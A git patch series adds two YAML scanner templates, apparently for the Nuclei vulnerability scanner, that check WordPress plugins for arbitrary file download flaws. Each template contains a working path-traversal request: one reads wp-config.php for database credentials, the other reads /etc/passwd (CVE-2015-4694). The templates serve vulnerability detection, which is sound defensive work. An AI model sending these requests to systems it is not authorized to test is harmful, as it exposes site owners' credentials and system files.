From 15acac63541343db4df05a974c4b36bfcb0fa797 Mon Sep 17 00:00:00 2001
From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com>
Date: Thu, 14 Oct 2021 08:58:10 +0900
Subject: [PATCH 1/6] Create aspose-words-exporter-file-download.yaml

---
 aspose-words-exporter-file-download.yaml | 26 ++++++++++++++++++++++++
 1 file changed, 26 insertions(+)
 create mode 100644 aspose-words-exporter-file-download.yaml

diff --git a/aspose-words-exporter-file-download.yaml b/aspose-words-exporter-file-download.yaml
new file mode 100644
index 0000000000..f75904a727
--- /dev/null
+++ b/aspose-words-exporter-file-download.yaml
@@ -0,0 +1,26 @@
+id: aspose-words-exporter-file-download
+
+info:
+  name: Aspose Words Exporter < 2.0 - Unauthenticated Arbitrary File Download
+  author: 0x_Akoko
+  severity: high
+  tags: wordpress,wp-plugin,lfi,wp
+  reference: https://wpscan.com/vulnerability/7869
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "DB_NAME"
+          - "DB_PASSWORD"
+        part: body
+        condition: and
+
+      - type: status
+        status:
+          - 200

From 02d00716604fa8f15ff499255192633dd6175f01 Mon Sep 17 00:00:00 2001
From: Prince Chaddha <prince@projectdiscovery.io>
Date: Thu, 14 Oct 2021 16:33:38 +0530
Subject: [PATCH 2/6] Update and rename
 aspose-words-exporter-file-download.yaml to
 vulnerabilities/wordpress/aspose-words-file-download.yaml

---
 .../wordpress/aspose-words-file-download.yaml            | 9 ++++++---
 1 file changed, 6 insertions(+), 3 deletions(-)
 rename aspose-words-exporter-file-download.yaml => vulnerabilities/wordpress/aspose-words-file-download.yaml (62%)

diff --git a/aspose-words-exporter-file-download.yaml b/vulnerabilities/wordpress/aspose-words-file-download.yaml
similarity index 62%
rename from aspose-words-exporter-file-download.yaml
rename to vulnerabilities/wordpress/aspose-words-file-download.yaml
index f75904a727..6cf04ee7eb 100644
--- a/aspose-words-exporter-file-download.yaml
+++ b/vulnerabilities/wordpress/aspose-words-file-download.yaml
@@ -1,11 +1,14 @@
-id: aspose-words-exporter-file-download
+id: aspose-words-file-download
 
 info:
   name: Aspose Words Exporter < 2.0 - Unauthenticated Arbitrary File Download
   author: 0x_Akoko
   severity: high
-  tags: wordpress,wp-plugin,lfi,wp
-  reference: https://wpscan.com/vulnerability/7869
+  description: The Aspose.Words Exporter WordPress plugin is affected by an Arbitrary File Download security vulnerability.
+  reference:
+    - https://wpscan.com/vulnerability/7869
+    - https://wordpress.org/plugins/aspose-doc-exporter
+  tags: wordpress,wp-plugin,lfi
 
 requests:
   - method: GET

From 718f49c6678725fab82d741040e75655a84cd6bb Mon Sep 17 00:00:00 2001
From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com>
Date: Sat, 16 Oct 2021 18:44:32 +0900
Subject: [PATCH 3/6] Create CVE-2015-4694.yaml

---
 CVE-2015-4694.yaml | 24 ++++++++++++++++++++++++
 1 file changed, 24 insertions(+)
 create mode 100644 CVE-2015-4694.yaml

diff --git a/CVE-2015-4694.yaml b/CVE-2015-4694.yaml
new file mode 100644
index 0000000000..e17313f7e9
--- /dev/null
+++ b/CVE-2015-4694.yaml
@@ -0,0 +1,24 @@
+id: CVE-2015-4694
+
+info:
+  name: Zip Attachments <= 1.1.4 - Arbitrary File Download
+  author: 0x_Akoko
+  severity: high
+  tags: lfi,wordpress,wp,cve
+  reference: https://wpscan.com/vulnerability/8047
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd'
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 200

From d461c1f77cc764ebcfee7637a7bf1b518f73bf10 Mon Sep 17 00:00:00 2001
From: Prince Chaddha <prince@projectdiscovery.io>
Date: Sun, 17 Oct 2021 08:01:28 +0530
Subject: [PATCH 4/6] Update and rename CVE-2015-4694.yaml to
 cves/2015/CVE-2015-4694.yaml

---
 CVE-2015-4694.yaml => cves/2015/CVE-2015-4694.yaml | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)
 rename CVE-2015-4694.yaml => cves/2015/CVE-2015-4694.yaml (72%)

diff --git a/CVE-2015-4694.yaml b/cves/2015/CVE-2015-4694.yaml
similarity index 72%
rename from CVE-2015-4694.yaml
rename to cves/2015/CVE-2015-4694.yaml
index e17313f7e9..6b81b9705d 100644
--- a/CVE-2015-4694.yaml
+++ b/cves/2015/CVE-2015-4694.yaml
@@ -4,8 +4,9 @@ info:
   name: Zip Attachments <= 1.1.4 - Arbitrary File Download
   author: 0x_Akoko
   severity: high
-  tags: lfi,wordpress,wp,cve
+  description: The zip-attachments plugin allows arbitrary file downloads because it does not check the download path of the requested file. 
   reference: https://wpscan.com/vulnerability/8047
+  tags: lfi,wordpress,cve,cve2015,wp-plugin
 
 requests:
   - method: GET

From 39ab764bfa0618b4f87458f4ecf9ee473de65c80 Mon Sep 17 00:00:00 2001
From: Prince Chaddha <prince@projectdiscovery.io>
Date: Sun, 17 Oct 2021 08:03:02 +0530
Subject: [PATCH 5/6] Update CVE-2015-4694.yaml

---
 cves/2015/CVE-2015-4694.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/cves/2015/CVE-2015-4694.yaml b/cves/2015/CVE-2015-4694.yaml
index 6b81b9705d..c273f16a80 100644
--- a/cves/2015/CVE-2015-4694.yaml
+++ b/cves/2015/CVE-2015-4694.yaml
@@ -4,7 +4,7 @@ info:
   name: Zip Attachments <= 1.1.4 - Arbitrary File Download
   author: 0x_Akoko
   severity: high
-  description: The zip-attachments plugin allows arbitrary file downloads because it does not check the download path of the requested file. 
+  description: The zip-attachments plugin allows arbitrary file downloads because it does not check the download path of the requested file.
   reference: https://wpscan.com/vulnerability/8047
   tags: lfi,wordpress,cve,cve2015,wp-plugin
 

From dfc4a64fdcb13fc41e790c52aa63b9c88df4c16d Mon Sep 17 00:00:00 2001
From: GitHub Action <action@github.com>
Date: Sun, 17 Oct 2021 11:26:16 +0000
Subject: [PATCH 6/6] Auto Generated CVE annotations [Sun Oct 17 11:26:16 UTC
 2021] :robot:

---
 cves/2015/CVE-2015-4694.yaml | 5 +++++
 1 file changed, 5 insertions(+)

diff --git a/cves/2015/CVE-2015-4694.yaml b/cves/2015/CVE-2015-4694.yaml
index c273f16a80..97b8256f1d 100644
--- a/cves/2015/CVE-2015-4694.yaml
+++ b/cves/2015/CVE-2015-4694.yaml
@@ -7,6 +7,11 @@ info:
   description: The zip-attachments plugin allows arbitrary file downloads because it does not check the download path of the requested file.
   reference: https://wpscan.com/vulnerability/8047
   tags: lfi,wordpress,cve,cve2015,wp-plugin
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
+    cvss-score: 8.60
+    cve-id: CVE-2015-4694
+    cwe-id: CWE-22
 
 requests:
   - method: GET